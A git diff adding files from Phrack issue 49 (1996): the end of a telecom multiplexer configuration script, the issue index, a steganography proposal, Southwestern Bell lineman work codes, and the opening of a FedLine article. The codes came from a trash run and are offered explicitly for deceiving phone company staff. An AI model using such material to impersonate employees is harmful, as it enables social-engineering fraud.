+     TRANSMIT "CN1 T2 RE!"
+     TRANSMIT "CN1 T3 RE!"
+
+     ;ENABLE TX OVERHEAD NODE 1 DP3022
+     TRANSMIT "CN1 T1 TE!"
+     TRANSMIT "CN1 T2 TE!"
+     TRANSMIT "CN1 T3 TE!"
+
+     ;SIGNAL DEGRADE 10E-8 NODE 1 DP3158
+     TRANSMIT "CN1 T1 S8!" 
+     TRANSMIT "CN1 T2 S8!"
+     TRANSMIT "CN1 T3 S8!"
+
+     ;DISABLE BLUE INSERTION NODE 2 DP3019
+     TRANSMIT "CN2 T1 BE!"
+     TRANSMIT "CN2 T2 BE!"
+     TRANSMIT "CN2 T3 BE!"
+
+     ;ENABLE PARITY CORRECTION NODE 2 DP3020
+     TRANSMIT "CN2 T1 PE!"
+     TRANSMIT "CN2 T2 PE!"
+     TRANSMIT "CN2 T3 PE!"
+
+     ;ENABLE RX OVERHEAD NODE 2 DP3021
+     TRANSMIT "CN2 T1 RE!"
+     TRANSMIT "CN2 T2 RE!"
+     TRANSMIT "CN2 T3 RE!"
+
+     ;ENABLE TX OVERHEAD NODE 2 DP3022
+     TRANSMIT "CN2 T1 TE!"
+     TRANSMIT "CN2 T2 TE!"
+     TRANSMIT "CN2 T3 TE!"
+
+     ;SIGNAL DEGRADE 10E-8 NODE 2 DP3158
+     TRANSMIT "CN2 T1 S8!" 
+     TRANSMIT "CN2 T2 S8!"
+     TRANSMIT "CN2 T3 S8!"
+
+;LINE LEARN ALL MULTIPLEXERS BOTH NODES
+TRANSMIT "CN1 M1 L!"
+TRANSMIT "CN1 M2 L!"
+TRANSMIT "CN1 M3 L!"
+TRANSMIT "CN2 M1 L!"
+TRANSMIT "CN2 M2 L!"
+TRANSMIT "CN2 M3 L!"
+
+;CONFIGURATION IS COMPLETE EXIT THE PROGRAM
+CLEAR
+ALARM 1
+LOCATE 10,20
+MESSAGE "......CONFIGURATION COMPLETE......"
+LOCATE 14,17
+MESSAGE "CONTINUE WITH SECTION 5 OF CERTIFICATION"
+ALARM 2
+PAUSE 5
+EXIT
+
+
+----------------------------------------------------------------------------
+			Glossary of Terms
+
+4W	Four Wire
+ACO	Alarm Cut-Off
+ACTV    Active (module -- carrying traffic)
+AGC 	Automatic Gain Control
+AIS     Alarm Indication Signal -- indicates an alarm upstream
+AMI	Alternate Mark Inversion -- a technique by which the polarity of
+	alternate pulses is inverted
+APD	Avalanche Photo Diode -- used for detecting pulses of light
+	at the receive end of an optical fiber
+AUD	Audible alarm
+BDF	Battery Distribution Frame
+BER	Bit Error Rate
+BIP	Bit Interleave Parity
+BPV	Bipolar Violation -- signal is not alternating as expected
+CAMMS   Centralized Access Maintenance and Monitoring System --
+        a bay-mounted shelf with push buttons and an luminescent display,
+	which is used to control FMT-150 networks, as well as other 
+	Northern Telecom transmission equipment
+CDP	Centralized Display Panel
+CEV	Controlled Environment Vault
+CO	Central Office
+CPC	Common Product Code -- a Northern Telecom code used to identify
+	equipment
+DDD	Direct Distance Dialing
+DM-13   Digital Multiplexer which multiplexes between DS-1/1C/2 signals
+	and DS-3 signals
+DNA	Dynamic Network Architecture
+E2A	A serial interface for alarm polling of equipment
+FE	Frame Error
+FER	Frame Error Rate
+FL	Frame Loss
+FLC 	Frame Loss Counter
+FLS	Frame Loss Seconds
+FPD	Future Product to be Developed
+Group	A multiplexed signal made up of four DS-1s, two DS-1Cs, or 
+	one Ds-2
+Hub	An FMT-150 site which branches one 150 Mb/s signal into two or
+	three signals, in different directions, without sacrificing 
+	OA & M continuity
+LBR	Loopback Request
+MCU	Maintenance Control Unit
+MM	Multimode Optical Fiber
+MSB	Most Significant Bit
+Muldem  Multiplexer/demultiplexer
+NRZ	Non-Return to Zero
+OTT	Optical Termination Tray
+PEC	Product Engineering Code -- a Norther Telecom code used to identify
+	equipment.  The preferred code to be used when ordering Northern
+	Telecom equipment.
+PER	Parity Error Rate
+PES	Parity Error Seconds
+RTO	Ready To Order
+SCU	Service Channel Unit
+SMB	Sub-Miniature BNC type connector
+SR	Stuff Request
+STX	(Pseudo) Synchronous Transport Signal: First Level at
+	49.92  Mb/s (Northern Telecom)
+TBOS	Telemetry Byte Oriented System
+VIS	Visual Alarm
+WDM	Wavelength Division Multiplexing
+XOW	Express Orderwire
+
diff --git a/phrack49/1.txt b/phrack49/1.txt
new file mode 100644
index 0000000..8f08260
--- /dev/null
+++ b/phrack49/1.txt
@@ -0,0 +1,169 @@
+				.oO Phrack 49 Oo.
+
+			  Volume Seven, Issue Forty-Nine
+				     
+				      1 of 16
+
+				  Issue 49 Index
+			       ____________________
+
+				 P H R A C K   4 9
+
+				 November 08, 1996
+			       ____________________
+
+
+Welcome to the next generation of Phrack magazine.  A kinder, gentler, Phrack.
+A seasoned, experienced Phrack.  A tawdry, naughty Phrack.  A corpulent, 
+well-fed Phrack.  Phrack for the whole family.  Phrack for the kids, Phrack 
+for the adults.  Even Phrack for the those enjoying their golden years.
+
+If you thought 48 was a fluke, here is 49, RIGHT ON SCHEDULE.  Full speed 
+ahead, baby.  We promised timely Phrack.  We promised quality Phrack.  Here 
+are both in ONE CONVENIENT PACKAGE!  We trimmed the fat to bring you the lean
+Phrack.  Chock full of the healthy information you need in your diet.  All 
+natural.  No artificial ingredients.  No snake oil.  No placebo effect.  
+Phrack is full of everything you want, and nothing you don't.
+	
+This issue is the first *official* offering from the new editorial staff.  If
+you missed them, our prophiles can be found in issue 48.  Speaking of 48, 
+what a tumultuous situation article 13 caused.  All that wacking SYN flooding.
+Well, it got the job done and my point across.  It got vendors and programmers
+working to come up with work-around solutions to this age-old problem.  Until 
+recently, SYN-flooding was a skeleton in the closet of security professionals.
+It was akin the crazy uncle everyone has, who thinks he is Saint Jerome.  We 
+all knew it was there, but we ignored it and kinda hoped it would go away...  
+Anyway, after this issue, I hope it *will* just go away.  I have done 
+interviews for several magazines about the attack and talked until I was blue 
+in the face to masses of people.  I think the word is out, the job is done.  
+Enough *is* enough. " SYN_flooding=old_hat; ".  Onto bigger and better things.
+
+A few more quick points (after all, you want Phrack Warez, not babbling 
+daemon9).  I want to thank the community for supporting me (and co.) thus far.
+Countless people have been quite supportive of the Guild, the Infonexus, and 
+of Phrack.  Time and work do permit me to get back to all of you individually,
+so just a quick blurb here.  Thank you all.  I will be using Phrack as a tool 
+to give back to you, so please mail me (or any of the editors with your 
+suggestions).  This is *your* magazine.  I just work here.  
+
+Most of all, I am stoked to be here.  I am giving this my all.  I'm fresh, I'm
+ready... I'm hyped + I'm amped (most of my heros don't appear on no stamps..).
+
+Drop us a line on what you think of 49.  Comments are encouraged.
+
+
+Bottom line (and you *can* quote me on this):  Phrack is BACK.  
+
+	- daemon9
+
+       [ And remember: r00t may own you, but the Guild loves you ]
+     [ TNO, on the other hand, doesn't even fucking care you exist ]
+
+---------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+	  Editors : daemon9, Datastream Cowboy, Voyager
+	  Mailboy : Erik Bloodaxe
+	    Elite : Nirva (*trust* me on this one)
+	   Raided : X (investigated, no charges as of yet)
+   Hair Technique : Mycroft, Aleph1
+	    Tired : TCP SYN flooding
+	    Wired : Not copping silly slogans from played-out, vertigo 
+		    inducing magazines.
+	Pissed off: ludichrist
+	 Pissed on: ip
+	     News : DisordeR
+	   Thanks : Alhambra, Halflife, Snocrash, Mythrandir, Nihil, jenf,
+		    xanax, kamee, t3, sirsyko, mudge. 
+       Shout Outs : Major, Cavalier, Presence, A-Flat, Colonel Mustard,
+		    Bogus Technician, Merc, Invalid, b_, oof, BioHazard,
+		    Grave45, NeTTwerk, Panzer, The Bishop, TeleMonster,
+		    Ph0n-E, loadammo, h0trod.
+
+Phrack Magazine V. 7, #49, November 08, 1996.   ISSN 1068-1035
+Contents Copyright (c) 1996 Phrack Magazine. All Rights Reserved.
+Nothing may be reproduced in whole or in part without written
+permission from the editors.  Phrack Magazine is made available 
+quarterly to the amateur computer hobbyist free of charge.  
+Any corporate, government, legal, or otherwise commercial usage 
+or possession (electronic or otherwise) is strictly prohibited without 
+prior registration, and is in violation of applicable US Copyright 
+laws. To subscribe, send email to phrack@well.com and ask to be 
+added to the list.
+
+		    Phrack Magazine
+		    603 W. 13th #1A-278              (Phrack Mailing Address)
+		    Austin, TX 78701
+
+		    ftp.fc.net                       (Phrack FTP Site)
+		    /pub/phrack
+		    
+		    http://www.fc.net/phrack         (Phrack WWW Home Page)
+		    
+		    phrack@well.com                  (Phrack E-mail Address)
+		    or phrackmag on America Online
+		    
+Submissions to the above email address may be encrypted
+with the following key (note this is a NEW key): 
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6.2
+
+mQENAzJuWJgAAAEH/2auap+FzX1AZOsQRPWRrRSOai2ZokfVpWWJI8DRuSpX9l7w
+5qWHrZdL/RweA4lgwAmcrAOD6d8+AzZfXEhkKi92G9ZNy2cjsb5g7oamkcPmC03h
+pdhRe5rHXDWUtXDEhHlkV0WvkLXrhFijW2VdJ2UDFyFd8q0nBSIz+JTGneNO0w4q
+aowCx3gZpEb4hkEU1LFoJXywZhnBg06jSxD9exbBF2WKeealqTlntlcsMmeJ3OdS
+9fqnGI19BWirqkIJYtNXdzP4M2usOEvikrdhXwSbCNcDGcY6pyKco2rKbBUj5V2I
+8/2L0TSGSaRBZ/YKRplwycldy63UVVTLMNGQCCUABRG0KlBocmFjayBNYWdhemlu
+ZSA8cGhyYWNrZWRpdEBpbmZvbmV4dXMuY29tPg==
+=eHJS
+-----END PGP PUBLIC KEY BLOCK-----
+
+	ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED
+
+Phrack goes out plaintext...  You certainly can subscribe in plaintext
+
+
+			   .oO Phrack 49 Oo.
+		 -------------------------------------
+			   Table Of Contents
+		
+ 1. Introduction                                                        7  K
+ 2. Phrack loopback                                                     6  K
+ 3. Line Noise                                                          65 K 
+ 4. Phrack Prophile on Mudge                       by Phrack Staff      8  K
+ 5. Introduction to Telephony and PBX systems      by Cavalier          100K
+ 6. Project Loki: ICMP Tunneling                   by daemon9/alhambra  10 K 
+ 7. Project Hades: TCP weaknesses                  by daemon9           38 K
+ 8. Introduction to CGI and CGI vulnerabilities    by G. Gilliss        12 K
+ 9. Content-Blind Cancelbot                        by Dr. Dimitri Vulis 40 K
+10. A Steganography Improvement Proposal           by cjm1              6  K
+11. South Western Bell Lineman Work Codes          by Icon              18 K 
+12. Introduction to the FedLine software system    by Parmaster         19 K
+13. Telephone Company Customer Applications        by Voyager           38 K
+14. Smashing The Stack For Fun And Profit          by Aleph1            66 K
+15. TCP port Stealth Scanning                      by Uriel             32 K
+16. Phrack World News                              by Disorder          109K
+
+									575k
+		 -------------------------------------
+
+"...There's MORE than maybes..."
+
+	- Tom Regean (Gabriel Bryne) "Miller's Crossing"
+	[ Obviously referring to the blatent truism that Phrack IS back ]
+
+"...Fuckin' Cops..."
+
+	- Verbal Kint/Keyser Soze (Kevin Spacey) "The Usual Suspects"
+	[ Not sure what was meant by that.. ]
+
+"Got more funky styles than my Laserjet got fonts"
+	- 311/Grassroots "Omaha Stylee"
+	[ That would be referring to us, of course ]
+
+EOF
+
diff --git a/phrack49/10.txt b/phrack49/10.txt
new file mode 100644
index 0000000..11442cd
--- /dev/null
+++ b/phrack49/10.txt
@@ -0,0 +1,89 @@
+                              .oO Phrack 49 Oo.
+
+                        Volume Seven, Issue Forty-Nine
+
+                                  10 of 16
+  
+	
+              A Steganography Implementation Improvement Proposal
+
+			    by: cjm1@concentric.net 
+
+[ 	For those of you who do not know, steganography is cryptographic
+technique that simply hides messages inside of messages.  The sender composes
+an innocuous message and then, using one of many tactics, injects the secret
+message into it.  Some techniques involve: invisible inks, character 
+distortion, handwriting differences, word/letter frequency doping, bit 
+flipping, etc...  The method the author discusses hinges upon a well known
+steganographic implementation, low-order bit flipping in graphic images. -d9 ]
+
+	Steganography is a technique for hiding data in other data.  The 
+general method is to flip bits so that reading the low-order bit of each of
+8-bytes gets one a character.  This allows one to use a picture or a sound
+file and hide data, resulting in a small bit of hopefully unnoticeable noise 
+in the data and a safely hidden cache of data that can later be extracted.
+This paper details a method for making steganographically hidden data more
+safe, by using pseudo-random dispersion.
+	
+	Ordinarily, if someone suspects that you have data hidden in, say, a
+GIF file, they can simply run the appropriate extractor and find the data.  If
+the data is not encrypted, it will be plain for anyone to see.   This can be
+ameliorated by using a simple password protection scheme, hiding the password
+in the GIF as a header, encrypting it first with itself.  If someone does not
+know the password, they cannot extract the data.  This is of course reasonably
+safe, depending on the encryption scheme used, and I recommend it.  But, the
+hidden data can be made even safer.
+	
+	Pseudo-random dispersion works by hiding a password, and a seed for a
+random-number-generator in the encrypted header.  then, a random number of bytes
+are passed by, before a low-order bit is flipped. 
+	
+	To do this, one must first calculate how many bytes a bit can take up 
+for itself.  For instance, to hide an 800 character message in a GIF would 
+mean each character needs 8 bytes (8 bits per character, 1 byte per low-order 
+bit), so you need 6,400 bytes of data to hide the message in, 8 bytes per 
+character.  Let's say we have a GIF that is 10 times this size: 64,000 bytes.
+Thus we have 80 bytes per character to hide data in.  Since each bit takes a 
+byte, we have 10 bytes per bit to hide data in!  Therefore, if we take a 
+pseudo-random number between 1 and 10, and use that byte to hide our low-order
+bit in, we have achieved a message dispersed through the GIF in a pseudo-random
+fashion, much harder to extract.  A message in which each byte has a bit which
+is significant to the steganographically hidden message can be extracted with 
+ease relative to a message in which there are 10 possible bytes for each bit
+of each character.  The later is exponentially harder to extract, given no
+esoteric knowledge.
+	
+	A slight improvement can be made to this algorithm.  By re-calculating
+the number of available bytes left for each bit after each bit is hidden, the 
+data is dispersed more evenly throughout the file, instead of being bunched up
+at the start, which would be a normal occurrence.  If you use pseudo-random
+number generator, picking numbers from 0-9, over time, the values will smooth 
+to 5.  This will cause the hidden message to be clustered at the beginning
+of the GIF.  By re-calculating each time the number of available bytes left
+we spread the data out throughout the file, with the added bonus that later 
+bits will be further spread apart than earlier ones, resulting in possible
+search spaces of 20, 30, 100, or even 1,000 possible bytes per bit.  This too
+serves to make the data much harder to extract.
+	
+	I recommend a header large enough for an 8 character ASCII password,
+an integral random-number seed, an integral version number, and an place 
+holder left for future uses.  The version number allows us to tweak the 
+algorithm and still be able to be compatible with past versions of the 
+program.  The header should be encrypted and undispersed (ie: 1 byte per 
+bit of data) since we haven't seeded the random-number generator yet for 
+dispersion purposes.
+	
+	It is useful to make the extractor in such a way that it always 
+extracts something, regardless of the password being correct or not.  Doing
+this means that it is impossible to tell if you have guessed a correct password
+and gotten encrypted data out, or merely gotten out garbage that looks like
+encrypted data.  Use of a password can also be made optional, so that none is
+necessary for extraction.  A simple default password can be used in these 
+cases.  When hiding encrypted data, there is no difference to the naked 
+eye between what is extracted and what is garbage, so no password is 
+strictly necessary.  This means no password has to be remembered, or 
+transmitted to other parties.  A third party cannot tell if a real password 
+has been used or not.  It is important for safety purposes to not hide the 
+default password in the header if no password is used.  Otherwise, a simple 
+match can be made by anyone who knows the default password.
+
diff --git a/phrack49/11.txt b/phrack49/11.txt
new file mode 100644
index 0000000..32e46d3
--- /dev/null
+++ b/phrack49/11.txt
@@ -0,0 +1,361 @@
+                               .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                    11 of 16
+
+
+                A listing of South Western Bell Lineman Work Codes
+
+                         Written by: Icon
+
+        Have you ever wanted to bullshit a telco employee but you don't 
+have the proper acronym or code that would help convince them?  Well here 
+is a nearly complete listing of all of the Disposition Codes that I found 
+on a trash run.  Enjoy...
+
+         
+		-= Disposition Codes =-
+
+
+[The following is an exact word for word type up]
+
+Disposition Code 01XX - Station Set, Business Services:
+This code applies to all troules located in TELCO-provided station set 
+equipment, including the mounting cord and handset cord, when used for OCS
+classes of service.
+
+Disposition Code 02XX - Other Station Equipment, OSC Business Services 
+(or Public Services):
+This code applies to all troubles in station equipment (other than station 
+sets) including switchboards, PBX systems, switching equipment on the 
+customer premises, etc. and to Public Services (COIN) station equipment.
+
+Disposition Code 03XX - Station Wiring
+0310 Premise Termination: Coin/Coinless
+0370 Network Termination: Other
+0371 Protector: Applies when trouble is located in a protective interface
+0373 Network Interface: Applies when trouble is located in network interface
+0375 Network Terminating Wire: Applies when trouble is located in the wire 
+     between the protector/cable termination and the network interface of
+     demarcation
+0378 Side Wall - Jumper missing
+0379 Side Wall - Jumper wrong
+0380 Drop Other
+0381 Aerial-Paired: Applies to trouble located in one-pair aerial drop 
+     service wire
+0382 Aerial-Multiple: Applies to trouble located in multiple-paired aerial
+     drop service wire 
+0383 Buried Drop - Repaired Initial Dispatch: Applies to trouble located in
+     buried drop and total repaired on first dispatch
+0384 Buried Drop - Temporary Places, No Recon: Applies to trouble located in
+     buried drop and a subsequent visit is not needed for drop retermination
+0385 Buried Drop - Temporary Placed, Recon Required: Applies to trouble 
+     located in buried drop and a subsequent visit is needed for drop 
+     placement and recon.
+0386 Drop, Left In: Applies to trouble located in a drop terminated to the
+     cable pair at a location other than that of the subscriber's
+0387 Drop Reversed
+0388 Buried Drop - Drop Not Buried: Applies when temporary drop is removed 
+     and newly placed buried drop is reconned
+0389 Temporary Drop Not Buried - Repaired: Applies to trouble located in the 
+     temporary drop and it is repaired
+0390 Network Miscellaneous Apparatus
+
+Disposition Code 04XX - Outside Plant
+0401 Pair Transferred - Defective Pair Left: Applies when service is restored
+     by transferring the customer's service to a different cable pair and the
+     original defect is not corrected.
+0402 Pair Cut Dead To The Field: Applies when service is restored by removing
+     faulted conductor bridge tap which has affected the customer's service
+     and the original defect is not corrected
+0403 Pair Transposed: Applies when conductors are transposed between two or 
+     more points to restore customer service and the original defect is not
+     corrected
+0404 Defective Section/Temporary Drop Placed: Applies when trouble is located
+     and a drop is placed as a temporary cable between terminals.
+0405 Defective Pair - Encapsulated Plant: Applies when trouble is 
+     encapsulated plant and pair is not fixed
+0407 Pair Transferred - No Defective Pair Left: Applies when service is 
+     restored by transferring the customer's service to a different cable pair
+     (usually for record purposes) and no defective pair is involved (i.e., 
+     pair left off cable transfer, telephone number assigned on wrong pair).
+0410 Cable Other: Applies when the trouble is fixed in the cable facility not
+     listed elsewhere
+0411 Sheath: Applies when damaged cable sheath or turnplate must be repaired 
+     to clear a trouble report
+0412 Cut Cable: Applies when a cable has been cut or damaged and must be 
+     repaired to clear trouble reports
+0413 Wet Cable: Applies when a cable has gotten wet and must be dried and/or
+     cutaround to clear trouble reports
+0416 Conductor: Applies when trouble is located in cable conductors, such as 
+     defective insulation, etc.
+0420 Closure/Splice Case: Applies when trouble is located in cable closures
+     and splice cases
+0421 Temporary Closure: Applies to trouble located in temporary type closures
+0423 Encapsulated: Applies to a trouble located within an encapsulated splice
+     or closure. Includes troubles resulting from a defect in material,
+     workmanship during construction, or maintenance activities of an 
+     encapsulated splice
+0426 Ready Access Splice Case: Applies to trouble found in a ready access 
+     type splice case
+0430 Terminal - Other: Applies to trouble found in a terminal not otherwise
+     listed
+0431 Ready Access Terminal, All: Applies to trouble found in ready access 
+     type terminals in aerial or buried plant
+0433 Fixed Count Terminal, All: Applies when trouble is located in fixed 
+     count terminal in aerial or buried plant
+0436 Cross Box, RAI/SAI: Applies when trouble is located in a serving area
+     interface or FX box
+0440 Wire/Dual Plant - Other: Applies when trouble is located in wire or dual
+     wire plant not elsewhere listed
+0442 Open/Rural Wire: Applies when trouble is located in wire for 
+     distribution, i.e., open wire, c-rural wire, and d-underground wire
+0470 Pair Gain System: Applies when trouble is located in the Remote Terminal
+     of the pair gain system
+0471 Repeater Failure: Applies when trouble is located in the repeater of a 
+     Pair Gain System
+0472 Battery Failure: Applies when trouble is located in the battery of a 
+     Pair Gain System
+0473 Common Circuit Pack: Applies when trouble is located in the common  
+     circuit pack of a Pair Gain System
+0474 Channel Unit Exchange: Applies when trouble is located in the channel
+     unit (exchange type)
+0475 Channel Unit Special: Applies when trouble is located in the channel 
+     unit (special type)
+0476 Routing: Applies when trouble is with the routing
+0477 Rectifier Failure: Applies when trouble is caused by rectifier failure
+0478 Wiring: Applies when trouble is caused by the wiring
+0470 Commercial Power Failure: Applies when trouble is caused because of 
+     commercial power failure
+0480 Cable Miscellaneous/Other
+0481 Pole/Guy/Anchor/Trench: Applies when a trouble is the result of a pole,    
+     guy, anchor, route signs, or trench associated with outside plant
+0483 Fiber Optics - All: Applies when a trouble is the result of conditions
+     associated with fiber optics
+
+Disposition Code 05XX - Central Office
+0511 Common Equipment 
+0512 Linkage/Network/Grid
+0513 Line Equipment
+0514 Billing Equipment
+0515 Trunk
+0516 Public Service Trunk
+0520 Translations - Other
+0521 Generic Work Error
+0522 Generic Program Error
+0523 Parameter - Work Error
+0524 Parameter - Document Error
+0525 Line - Work Error
+0526 Line - Document Error
+0527 Network - Work Error
+0528 Network - Document Error
+0530 Intercept or Disconnect Document Error
+0531 MDF Cross-Connection Missing
+0532 MDF Cross-Connection Broken
+0533 MDF Cross-Connection Work Error
+0534 MDF Cross-Connection Document Error
+0535 Other Cross-Connection Work Error
+0536 Other Cross-Connection Document Error
+0537 Billing Cross-Connection Work Error
+0538 Billing Cross-Connection Document Error
+0539 Intercept or Disconnect Work Error
+0540 Other Frame
+0541 Defective or operated protector
+0542 Missing Protection Device
+0543 Reversing Device
+0544 Terminal - Wire Clipping
+0545 Terminal Connection
+0546 Test Cord
+0550 Other Power
+0551 DC Power Equipment
+0552 AC Power Equipment
+0553 Ringer Plant
+0554 Standby Emergency Power
+0560 Miscellaneous Equipment - Other
+0561 Radio System
+0562 Line Testing Equipment
+0563 Concentrator
+0564 Range Extender - Applies when a report is the result of a defective 
+     range extender
+0565 Carrier System
+0566 Automatic Message Accounting Recording Center
+0580 Pair Gain System/RSS Other
+0583 Common Circuit Pack
+0584 Channel Unit Exchange
+0585 Channel Unit Special
+0586 Carrier Unit Replaced (AML/SLC-1)
+0587 Power
+0588 Wiring
+
+Disposition 06XX - Customer Action
+0600 Customer Action: Applies when a trouble report results from customer 
+     error or misuse of features in connection with custom calling service
+
+Disposition 07XX - Test OK
+0701 MC Retest Ok
+0708 SCC Test Ok
+0711 Test OK (Maintenance Center Use Only)
+0715 Customer Cancel Original (CSB Use Only)
+0717 Lead Test Ok
+0720 Link Retest Ok
+0730 Test OK TAN (Technician Use)
+0747 Test OK (Front End Closeout)
+0750 CSB Retest OK
+
+Disposition Code 08XX - Found OK - In
+0800 Found OK - In
+
+Disposition Code 09XX - Found Ok - Out
+0901 Found OK - Out, Non-Cable: Applies when trouble condition is determined
+     to be FOK between the serving terminal and the customer's side of the 
+     protector/network interface
+0910 Found Ok - Out, Cable: Applies when trouble condition is determined to 
+     be FOK between the serving terminal and the field side of the central
+     office
+
+Disposition Code 10XX - Referred Out
+1001 Referred Out: Applies when trouble reports are referred to other 
+     Maintenance Centers, agencies or departments not normally involved in
+     the trouble clearing effort
+
+Disposition Code 12XX - Customer Provided Equipment
+120X Voice Messaging Service
+1201 Voice Messaging Service 0 All
+121X Maintenance Contract (Inline/Inline Plus)
+1210 Cord: Customer has maintenance contract and a defective mounting cord was
+     replaced
+1211 Loaner Set Provided: Applies to those customers with an inline+ 
+     agreement, in which a loaner set is provided, or when the customer 
+     chooses to buy the replacement set
+1212 Inline Only - Set Trouble: Applies to customer with a maintenance 
+     agreement for IW only and the trouble is located in the set/equipment.
+     This code includes, but is not limited to receiver off hook, unplugged
+     sets, defective sets
+1213 Non-Standard IW (Customer Repair): Applies when the customer has an 
+     agreement for standard IW maintenance; however, the trouble is located
+     in non-standard IW and the customer will repair. NO CHARGE
+1214 Inside Wire: Applies to customers with an IW maintenance agreement and 
+     the technician repairs the IW. NO CHARGE
+1215 Non-Standard IW (Telco Replaced): Applies when the customer has a 
+     maintenance contract for standard IW maintenance; however, the trouble is 
+     located in non-standard IW and the technician will repair. PREMISES
+     WORK CHARGE IS APPLICABLE
+1217 No Access - Field Use: Applies on second no access, no trouble is found
+     at the customer premise
+1218 Inline/Inline Plus - Telco Fix Exceptions: Wire repair due to acts of 
+     God, such as floods, earthquake, riot, gross negligence, willful 
+     damage/vandalism. Also wire that does not meet SWBT installation practice
+     technical standards, or is not in satisfactory condition
+1219 Inline/Inline Plus - Customer Fix - Exceptions (See 1218 for exceptions)
+122X CPE - Other (No Maintenance Contract)
+1220 Radio Suppresser (Inline Customer): Applies when a radio suppresser is 
+     placed to resolve the trouble
+1221 Calling Party Hold: Applies when the trouble condition is a result of 
+     calling party hold. NO CHARGE
+1222 Set/Equipment: Applies when then trouble condition is determined by the
+     technician to be caused by the customer telephone set/equipment. No
+     maintenance agreement. A MAINTENANCE OF SERVICE CHARGE WILL APPLY
+1223 CPE (IW/CPE) No Dispatch: Applies when trouble is tested, but is 
+     determined to be in CPE via conversation with the customer and/or related tests. No repair dispatch is made. NO CHARGE
+1225 Receiver Off Hook: Applies when trouble is tested when cannot be located
+     in Telco facilities and the trouble report or service condition can be
+     attributed to a receiver off hook. MSC WILL APPLT
+1226 Set Unplugged: Applies when trouble is tested which cannot be located in
+     Telco facilities and the trouble report or service difficulty can be
+     attributed to unplugged CPE. MSG WILL APPLY
+1227 Public Extension (SEMI): Applies when trouble is tested which cannot be 
+     located in TELCO facilities and the trouble report or service condition
+     can be attributed to semi-public extension. Semi-public extension is
+     defined as a CPE instrument used as an extension on Telco provided coin
+     service. MSC WILL APPLY
+1228 Private Coin Service: Applies when trouble is tested which cannot be 
+     located in Telco facilities and the trouble report or service condition
+     can be attributed to private coin service. Private coin service is 
+     defined as a coin instrument and associated wire provided by a non-Telco
+1229 Cable Facilities (Not Telco Maintained): Applies when trouble is tested
+     which cannot be located in Telco facilities and the trouble report or 
+     service condition can be attributed to CPE cable facility. MSC WILL APPLY
+123X Intexchange Carrier
+1231 Intexchange Carrier: Applies when trouble is tested which cannot be 
+     located in Telco facilities or equipment and the services are provided
+     by an IC
+124X Unauthorized CPE/Usage/Tariff Violation
+1241 Dispatched trouble reports involving CPE that were installed under 
+     Contract I/M services, and are within the warranty time period, should
+     be closed to disposition code 12410 Contract I/M services, CPE. The 
+     disposition code 122X should not be used under these circumstances. NO
+     REPAIR CHARGE (MSR or RSC) or TIME SENSITIVE CHARGES APPLY
+1242 Dispatched trouble reports involving inside wire within the warranty time
+     period of the Contract I/M Services contract between SWT/SWBT should be 
+     closed to the appropriate disposition code 121X. Inside wire troubles 
+     reported by Non-Inline and Non-Contract I/M Services customers should 
+     continue to be closed to the appropriate disposition code 126X and
+     normal charges should apply.
+
+Disposition 12XX - Customer Provided Equipment 
+126X Time Sensitive Work/Isolation/No Maintenance Contract
+1261 Inside Wire - Telco Repair: Applies when trouble is tested which cannot
+     be located in Telco facilities and a trouble report or service condition
+     is attributed to the IW. The technician repairs the IW for an ADDITIONAL
+     CHARGE to the customer. (Time Sensitive - Repair Rates).
+1262 Inside Wire - SNI Not Available Cust Fix (Non-Inline): Applies when
+     trouble is tested which cannot be located in Telco Facilities and the
+     trouble report is isolated to the customer's side of the protector. The
+     technician installs a Network Interface but does not repair the trouble
+1263 Inside Wire - SNI Available - Cust Fix (Non-Inline): Applies when trouble
+     is tested which cannot be located in Telco facilities and a trouble 
+     report or service condition is in attributed to the CPE. A Network 
+     Interface is in place and the customer does the repair
+1264 No Authorization/Customer Repair: Applies when trouble is tested which 
+     cannot be located in Telco facilities and a trouble repor or service 
+     condition can be attributed to CPIW. Premise access is obtained and 
+     customer/customer's agent is unable to authorize repair charge.
+1265 Military Facility: Applies when trouble is isolated to I/W maintained by
+     military maintenance personnel.
+1266 NA for Non-Inline (Field Use)
+1267 CPE - No Access Subscriber Follow-up (MC USE ONLY): Applies when trouble
+     cannot be located in Telco facilities and a trouble report or service 
+     condition is attributed to the CPE. The technician does not have access
+     to the customer's premise, but a network interface is present.
+1268 Warranty: Applies when trouble is tested which cannot be located in 
+     Telco facilities but repair work is performed by the technician within
+     30 days of previous IW repair performed by Telco. (Proof of warranty is
+     the customer's responsibility). A SERVICE CHARGE IS NOT APPLICABLE
+127X Administrative Reports - Do Not Bill
+1275 Predictor/Scan/CPR: Applies when a trouble condition is detected by SCAN/ 
+     PREDICTOR or Calling Party Report, a dispatch is made and no work is 
+     performed. The trouble condition is attributed to the CPE. (A SERVICE
+     CHARGE IS NOT APPLICABLE)
+128X CSB Use Only
+1281 Front End Close Out (Customer Service Bureau Only): Apples when a
+     trouble report is determined to be caused by the CSB. The CSB will close
+     out this report with this disposition code.
+Disposition Code 129X MOOSA (Maintenance Center Use Only)
+1291 MOOSA Error Corrections
+
+Disposition Code 13XX
+1301 Other Departments - Telco
+1302 Non Telco
+1303 Wrong Number Reported
+1325 Service Order Worked - Link
+1326 Service Order Cancel/Delay
+1327 Service Order Changes
+
+Disposition Code 20XX - Air Pressure
+2010 Transducer
+2011 Contactor
+2012 Pressure Plug
+2013 Air Flow Sensor
+2014 Pipe
+2015 Manifold or Tubing
+2016 Dryers
+2017 Air Bottles
+2018 Fittings
+
+Disposition Code 30XX - Cable Location
+3010 Patrols and Inspections
+3011 Facility Located
+3012 No Facilities In Area
+
+
diff --git a/phrack49/12.txt b/phrack49/12.txt
new file mode 100644
index 0000000..0212b6e
--- /dev/null
+++ b/phrack49/12.txt
@@ -0,0 +1,457 @@
+                              .oO Phrack 49 Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                    12 of 16
+
+
+============================================================================
+
+                    FEDLINE (Message and Code Definitions)
+
+                  Your PC Window to the Federal Reserve Bank
+                                               
+                                by ParMaster
+
+
+============================================================================
+
+
+
+
+    The FEDLINE software package is a common Bank client for the Federal
+Reserve.  Used by Banks, Credit Unions, and other Financial Institutions,
+the amount of funds transferred on a daily basis matches or exceeds the 
+daily volume of all other EFT networks.  FEDLINE uses hardware encryption
+through a special PC card which operates using the US National Bureau of 
